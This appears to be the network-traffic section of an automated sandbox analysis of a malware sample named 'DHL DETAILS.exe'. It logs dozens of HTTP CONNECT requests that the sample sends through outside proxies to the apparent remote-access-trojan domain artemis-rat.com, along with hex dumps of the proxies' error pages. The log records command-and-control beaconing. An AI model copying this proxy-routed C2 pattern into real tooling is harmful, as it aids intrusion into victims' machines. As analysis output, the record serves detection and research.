                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.093152046 CET1286INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Server: Apache
                                                                                    Accept-Ranges: bytes
                                                                                    Cache-Control: no-cache, no-store, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Expires: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61
                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>500 Internal Server Error</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-rea
                                                                                    Mar 9, 2024 13:14:17.093221903 CET1286INData Raw: 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e
                                                                                    Data Ascii: son { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; backg
                                                                                    Mar 9, 2024 13:14:17.093238115 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a
                                                                                    Data Ascii: font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align: ce
                                                                                    Mar 9, 2024 13:14:17.093322992 CET1286INData Raw: 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69
                                                                                    Data Ascii: info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0; m
                                                                                    Mar 9, 2024 13:14:17.093338013 CET1286INData Raw: 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63
                                                                                    Data Ascii: F+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9
                                                                                    Mar 9, 2024 13:14:17.093385935 CET1286INData Raw: 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 59 37 70 34 38 35 45 53 41 56 6d 75 6c 64 76 7a 53 54 4b 77 32 66 71 48 53 47 4d 35 68 42 57 31 49 55 49 30 66 2f 4c 64
                                                                                    Data Ascii: yMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvB
                                                                                    Mar 9, 2024 13:14:17.093400955 CET1032INData Raw: 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38 74 68 2b 64 2b 70 68 63 69 38 46 4a 66 31 66 77 61 70 69 34 34 72 46 70 66 71 54 5a 41 6e 57 2b 4a 46 52 47 33 6b 66 39 34 5a 2b 73 53 71 64 52 31 55 49 69
                                                                                    Data Ascii: fBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb5y1NINq+beZBu8d84657wPYfN8pZBc
                                                                                    Mar 9, 2024 13:14:17.093494892 CET1286INData Raw: 35 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 73 70 61 6e
                                                                                    Data Ascii: 500</span> <span class="status-reason">Internal Server Error</span> </section> <section class="contact-info"> Please forward this error screen to artemis-rat.com's <a href="mailto:root@h
                                                                                    Mar 9, 2024 13:14:17.093631983 CET352INData Raw: 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 35 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d
                                                                                    Data Ascii: edium=cplogo&utm_content=logolink&utm_campaign=500referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyri


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    230192.168.2.55057149.228.131.16950006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.163161039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    231192.168.2.551035202.159.19.2134436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.165250063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    232192.168.2.55062443.131.242.162156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.166711092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    233192.168.2.551040202.159.19.2134436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.166717052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    234192.168.2.55058888.210.20.144200006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.167819023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.638554096 CET202INHTTP/1.0 404 Not Found
                                                                                    Content-Length: 717
                                                                                    Content-Type: text/html
                                                                                    Date: Sun, 28 Jan 2024 21:35:17 GMT
                                                                                    Expires: Sun, 28 Jan 2024 21:35:17 GMT
                                                                                    Server: Mikrotik HttpProxy
                                                                                    Proxy-Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    235192.168.2.551042202.159.19.2134436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.167905092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    236192.168.2.551045202.159.19.2134436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.168755054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    237192.168.2.55062720.24.43.214806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.174413919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.501046896 CET319INHTTP/1.1 403 Forbidden
                                                                                    Server: squid
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 17
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    X-Cache: MISS from cdn-fintech.info
                                                                                    X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                    Data Ascii: ERR_ACCESS_DENIED


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    238192.168.2.551064202.159.35.1894436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.176985979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    239192.168.2.551065202.159.35.1894436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.178323030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    240192.168.2.551068202.159.35.1894436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.179127932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    241192.168.2.55071254.178.159.199180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.179990053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.443542957 CET503INHTTP/1.1 400 Bad Request
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 324
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    242192.168.2.551072202.159.35.1894436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.180202961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    243192.168.2.549989117.160.250.163826352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.183456898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.833101988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.841980934 CET221INHTTP/1.1 403 Access Denied
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Connection: close
                                                                                    Cache-Control: no-store
                                                                                    Content-Type: text/html
                                                                                    Content-Language: en
                                                                                    Content-Length: 43
                                                                                    Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                    Data Ascii: You are not allowed to access the document.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    244192.168.2.54999436.134.91.8288886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.184564114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    245192.168.2.550844104.20.225.218806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.187690973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.342051983 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    246192.168.2.550855185.162.229.215806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.187894106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.341947079 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    247192.168.2.55067993.190.142.57312436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.192605972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.486598969 CET226INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Length: 101
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a
                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
